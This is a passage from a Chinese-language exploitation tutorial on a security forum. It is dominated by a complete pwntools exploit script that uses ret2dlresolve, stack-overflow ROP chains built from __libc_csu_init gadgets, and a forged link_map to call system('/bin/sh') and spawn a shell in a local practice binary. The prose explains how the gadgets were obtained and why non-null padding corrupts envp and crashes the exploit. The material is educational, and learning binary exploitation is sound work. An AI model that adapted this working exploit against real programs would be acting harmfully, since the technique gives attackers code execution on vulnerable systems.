    plt_0 = target_info['exec_info'].get_section_by_name('.plt').header.sh_addr
 
    payload = b'A' * target_info['buf2ver']
    payload += b'B' * target_info['addr_len']
    payload += pwn.p64(target_info['csu_pop_rdi_ret'])
    payload += pwn.p64(func_args_addr)
    payload += pwn.p64(plt_0)
    payload += pwn.p64(rela_index4fake_rela_plt)
    payload += b'\x00' * (target_info['setbuf_size'] - len(payload))
    return payload
 
'''
stage one   -> construct [fake data] and fill it to [fake address]
stage two   -> leaked link map address
stage three -> set the version in the link map to be empty
stage four  -> jump to plt [0], When _dl_resolve is running, [fake data] will be used
'''
 
def pwn4partial_relro_with_normal_lookup():
    payload_1, data4payload_1, bin_sh_addr, rela_index4rela_plt = rop_chain4fake_dl_resolve_data_fill()
    conn.send(payload_1)
    conn.send(data4payload_1)
 
    payload_2 = rop_chain4link_map_addr_leak()
    conn.send(payload_2)
    leak_data = conn.recv(target_info['addr_len'])
    link_map_addr = pwn.u64(leak_data)
    print('[++] receive: link map address {0}'.format(hex(link_map_addr)))
 
    payload_3 = rop_chain4verson4l_info_set2null(link_map_addr)
    conn.send(payload_3)
    data4payload_3 = pwn.p64(0)
    conn.send(data4payload_3)
 
    payload_4 = rop_chain4dl_resolve_with_normal_lookup_start(bin_sh_addr, rela_index4rela_plt)
    conn.send(payload_4)
 
def rop_chain4fake_link_map_fill(fake_data_len):
    rbx_val = 0
    payload = b'A' * target_info['buf2ver']
    payload += b'B' * target_info['addr_len']
    payload += csu_rop_chain_get(
        target_info['stdin_fd'], target_info['fake_addr'],
        fake_data_len, target_info['exec_info'].got['read'],
        rbx_val, rbx_val + 1,
        target_info['exec_info'].symbols['vuln']    # read again
    )
    payload += b'\x00' * (target_info['setbuf_size'] - len(payload))
    return payload
 
def negative2complement(val):
    bits_cnt4one_byte = 0x8
    max_size4complement = 2**(target_info['addr_len'] * bits_cnt4one_byte) - 1  # 0xffffffffffffffff
 
    val = val & max_size4complement
    return val
 
'''
_dl_fixup data used ->
    0x68: need an accessible address [addr_a], get STRTAB in .dynamic
    0x70: need an accessible address [addr_b], get SYMTAB in .dynamic
    0xf8: need an accessible address [addr_c], get JMPREL in .dynamic
 
[addr_b] -> [addr_b] + 0x8 -> get Elf64_Sym [addr_b_1]
    1. get symbol               ; *(addr_b_1 + symbol index) = symbol address
    2. get Elf64_Sym.st_other   ; *(symbol address + 0x5)
 
[addr_c] -> [addr_c] + 0x8 -> get Elf64_Rela [addr_c_1]
    1. get Elf64_Rela.r_offset address  ; *(addr_c_1 + 0x0)
    2. get Elf64_Rela.r_info address    ; *(addr_c_1 + 0x8)
        ( bit63 - sym - bit32 ; bit31 - type - bit0 )
        type value should be ELF_MACHINE_JMP_SLOT
 
other data ->
    store dynamic funcrtion args
 
if [Elf64_Sym.st_other == 3] -> lookup symbol by known addresses
 
fake data map info:
| 0x0    | 0x8        | 0x10                         | 0x18     | 0x20   | 0x28 - 0x38 |
| l_addr | for JMPREL | for Elf64_Rela, JMPREL.d_ptr | r_offset | r_info | padding     |
 
| 0x38       | 0x40                        | 0x48 - 0x68 | 0x68   | 0x70   | 0x78 - 0xf8 | 0xf8   |
| for SYMTAB | for Elf64_Sym, SYMTAB.d_ptr | padding     | STRTAB | SYMTAB | padding     | JMPREL |
 
add    0x8(%rax),%rdx
    -> rdx = l_addr
    -> 0x8(%rax) = *(rax + 0x8) = pedal function real address
 
_dl_fixup return value -> l_addr + Elf64_Sym.st_val -> l_addr + *(SYMTAB.d_ptr + 0x8)
    -> l_addr: distance from target to pedal
    -> *(SYMTAB.d_ptr + 0x8) -> *(unknow address) = pedal function real address
        -> unknow address = pedal function .got.plt address
        -> SYMTAB.d_ptr = pedal function .got.plt address - 0x8
'''
 
def fake_link_map_get():
    plt_0 = target_info['exec_info'].get_section_by_name('.plt').header.sh_addr
    pedal_addr = target_info['libc_info'].sym['read']
    pedal_got_addr = target_info['exec_info'].got['read']
    target2pedal_offset = target_info['libc_info'].sym['system'] - pedal_addr
 
    ELF_MACHINE_JMP_SLOT_val = 0x7
    addr4STRTAB_offset = 0x0
    addr4JMPREL_offset = 0x8
    addr4Elf64_Rela_offset = 0x18
    addr4SYMTAB_offset = 0x38
    addr4st_other_offset = 0x35
 
    # 0x0 ; l_addr
    fake_link_map = pwn.p64(negative2complement(target2pedal_offset))
    # 0x8 ; for JMPREL, fake_addr + 0x8 + relocation index (0) = fake_addr + 0x8
    fake_link_map += pwn.p64(0)
    # 0x10 ; for Elf64_Rela, JMPREL.d_ptr
    fake_link_map += pwn.p64(target_info['fake_addr'] + addr4Elf64_Rela_offset)
    # 0x18 ; for r_offset
    fake_link_map += pwn.p64(negative2complement(target_info['fake_addr'] + 0x30 - target2pedal_offset))
    # 0x20 ; for r_info
    fake_link_map += pwn.p64(ELF_MACHINE_JMP_SLOT_val)  # sym (symbol index) is 0x0
    # 0x28 - 0x38 ; padding
    fake_link_map += b'A' * 0x10
    # 0x38 ; for SYMTAB, fake_addr + 0x38 + symbol index (0) = fake_addr + 0x38
    fake_link_map += pwn.p64(0)
    # 0x40 ; for Elf64_Sym, SYMTAB.d_ptr
    fake_link_map += pwn.p64(pedal_got_addr - target_info['addr_len'])
    # 0x48 - 0x68
    fake_link_map += b'/bin/sh\x00'
    fake_link_map += b'B' * 0x18
    # 0x68 ; STRTAB
    fake_link_map += pwn.p64(target_info['fake_addr'] + addr4STRTAB_offset)
    # 0x70 ; SYMTAB
    fake_link_map += pwn.p64(target_info['fake_addr'] + addr4SYMTAB_offset)
    # 0x78 - 0xf8 ; padding
    fake_link_map += b'C' * 0x80
    # 0xf8 ; JMPREL
    fake_link_map += pwn.p64(target_info['fake_addr'] + addr4JMPREL_offset)
    return fake_link_map
 
'''
after [pop rdi ; ret] ->
    rsp + 0x0: fake link map address
    rsp + 0x8: relocation index
 
enter _dl_runtime_resolve_fxsave ->
    push   %rbx         # rsp + 0x0 = rbx ; rsp + 0x8 = fake link map address ; rsp + 0x10 = relocation index
    mov    %rsp,%rbx
    ......
    mov    0x10(%rbx),%rsi
    mov    0x8(%rbx),%rdi
    call   0x7ffff7fd6ff0 <_dl_fixup>
 
_dl_fixup(arg1, arg2) ->
    arg1 = rsp + 0x8 ; arg2 = rsp + 0x10
'''
 
def rop_chain4dl_resolve_with_specific_lookup_start():
    plt_0 = target_info['exec_info'].get_section_by_name('.plt').header.sh_addr
    plt_02second_instruction = 0x6
    arg1_address = target_info['fake_addr'] + 0x48
 
    payload = b'A' * target_info['buf2ver']
    payload += b'B' * target_info['addr_len']
    # align the rsp to 0x10
    payload += pwn.p64(target_info['csu_pop_rsi_r15_ret'])
    payload += pwn.p64(0)
    payload += pwn.p64(0)
    # set dynamic function args and dl resolve address
    payload += pwn.p64(target_info['csu_pop_rdi_ret'])
    payload += pwn.p64(arg1_address)
    payload += pwn.p64(plt_0 + plt_02second_instruction)
    # set _dl_fixup() args
    payload += pwn.p64(target_info['fake_addr'])                # fake link_map address
    payload += pwn.p64(0)                                       # relocation index
    payload += b'\x00' * (target_info['setbuf_size'] - len(payload))
    return payload
 
'''
stage one   -> construct [fake data] as the new [link map]
stage two   -> fill [fake data] to [fake address]
stage three -> jump to plt [0] [1]
'''
 
def pwn4partial_relro_with_specific_lookup():
    fake_link_map = fake_link_map_get()
    payload_1 = rop_chain4fake_link_map_fill(len(fake_link_map))
    conn.send(payload_1)
    conn.send(fake_link_map)
 
    payload_2 = rop_chain4dl_resolve_with_specific_lookup_start()
    conn.send(payload_2)
 
pwn.context.clear()
pwn.context.update(
    arch = 'amd64', os = 'linux',
)
 
target_info = {
    'exec_path': './ret2dlresolve_example',
    'exec_mode': '-',
    'exec_info': None,
    'libc_info': None,
    'addr_len': 0x8,
    'buf2ver': 0x70,
    'setbuf_size': 0x100,
    'csu_pop_ret': 0x401242,
    'csu_call_reg': 0x401228,
    'csu_pop_rsi_r15_ret': 0x401249,
    'csu_pop_rdi_ret': 0x40124b,
    'csu_pop_all_count': 0x6,
    'stdin_fd': 0x0,
    'stdout_fd': 0x1,
    'fake_addr': 0x0,
    'push_link_map_site': 0x403ff0,
}
 
if len(sys.argv) != 2 or arg_check(sys.argv[1]) != 0:
    usage_error()
 
target_info['exec_mode'] = sys.argv[1]
print('[--] tips: current mode = {0}'.format(target_info['exec_mode']))
 
if target_info['exec_mode'] == 'n':
    mode_suffix = 'NoRelRO'
    pwnfunc = pwn4norelro
elif target_info['exec_mode'] == 'pn':
    mode_suffix = 'PartialRelRO'
    pwnfunc = pwn4partial_relro_with_normal_lookup
elif target_info['exec_mode'] == 'ps':
    mode_suffix = 'PartialRelRO'
    pwnfunc = pwn4partial_relro_with_specific_lookup
else:
    usage_error()
 
target_info['exec_path'] = target_info['exec_path'] + '_' + mode_suffix
target_info['exec_info'] = pwn.ELF(target_info['exec_path'])
target_info['libc_info'] = target_info['exec_info'].libc
 
fake_addr2bss_bias = 0x100
target_info['fake_addr'] = target_info['exec_info'].bss() + fake_addr2bss_bias
 
conn = pwn.process(target_info['exec_path'])
 
conn.recvuntil('hello world\n')
pwnfunc()
conn.interactive()

特供的gadget

此处利用的gadget是_libc_csu_init函数提供的,但我当前使用的GLibC版本是2.36,已经超出了2.33,GLibC不会再向ELF文件中插入_libc_csu_init函数。

为了使用_libc_csu_init函数提供的gadget,这里手动编译了GLibC的2.31版本,因为_libc_csu_init函数位于libc_nonshared.a的内部,所以可以利用ar工具解包静态链接库,得到保护_libc_csu_init函数的elf-init.oS文件,当可执行程序编译时将该文件加入链接,就可以得到_libc_csu_init函数了。

1
2
3
4
5
6
7
8
9
10
11
12
ar -x libc_nonshared.a
 
atexit.oS   at_quick_exit.oS    elf-init.oS fstat64.oS  fstatat64.oS
fstatat.oS  fstat.oS            lstat64.oS  lstat.oS    mknodat.oS
mknod.oS    pthread_atfork.oS   stack_chk_fail_local.oS stat64.oS
stat.oS     warning-nop.oS
 
readelf -s ./elf-init.oS
Symbol table '.symtab' contains 14 entries:
......
    8: 0000000000000000    93 FUNC    GLOBAL DEFAULT    1 __libc_csu_init
......

如果想要查看GCC在编译过程的详细信息,可以添加--verbose参数进行查看。

成功PWN

运行上电的exploit后,就可以成功获取Shell了。

奇怪的崩溃

假如上方exploit中的payload的占位字符不使用\x00进行填充,而是使用普通字符填充,那么当exploit运行时,我们就会可能无法获取Shell,因为这个时候程序就崩溃了。

1
2
3
4
5
6
7
8
9
def csu_rop_chain_get(
    r12_arg1, r13_arg2, r14_arg3, r15_call_addr_base,
    rbx_call_addr_append, rbp_val, ret_addr
):
    .......
    payload += b'D' * target_info['addr_len'] # fix [add $0x8,%rsp]
    payload += b'E' * (target_info['csu_pop_count'] * target_info['addr_len'])
    payload += pwn.p64(ret_addr)
    return payload

程序崩溃的原因是,ret指令取出一个异常地址进行返回,进而导致崩溃。

这一问题出现的根源在于,GLibC通过__clone_internal函数创建进行时返回了错误码,这个错误码是内核返回的(syscall指令后出现),是内核出现错误了,还是我们的payload出现错误了呢?

1
2
3
4
do_system -> __spawni -> __spawnix
 
__spawnix:
    __clone_internal (&clone_args, __spawni_child, &args);

要知道Linux内核是经过千锤百炼的,创建进程更是被大量使用的功能,出错的概率非常小,那么问题在我们这边?

如果仔细观察__clone_internal接收的参数可以知道,它的参数依赖于__spawnix函数接收的参数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
static int
__spawnix (pid_t * pid, const char *file,
       const posix_spawn_file_actions_t * file_actions,
       const posix_spawnattr_t * attrp, char *const argv[],
       char *const envp[], int xflags,
       int (*exec) (const char *, char *const *, char *const *))
{
  ......
  args.err = 0;
  args.file = file;
  args.exec = exec;
  args.fa = file_actions;
  args.attr = attrp ? attrp : &(const posix_spawnattr_t) { 0 };
  args.argv = argv;
  args.argc = argc;
  args.envp = envp;
  args.xflags = xflags;
  ......
  struct clone_args clone_args =
    {
      .flags = CLONE_VM | CLONE_VFORK,
      .exit_signal = SIGCHLD,
      .stack = (uintptr_t) stack,
      .stack_size = stack_size,
    };
  ......
}

__spawnix函数接收的参数中,有一个非常特别的参数envp,它是程序的环境变量参数,被放置在栈上,因此它是非常容易被我们的payload影响的。

观察envp参数可以确认这一猜想,它里面的数据的确是payload里面用来填充的普通字符,但如果我们用\x00进行填充,那么envp就会被视作是空值,不会产生问题。


[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//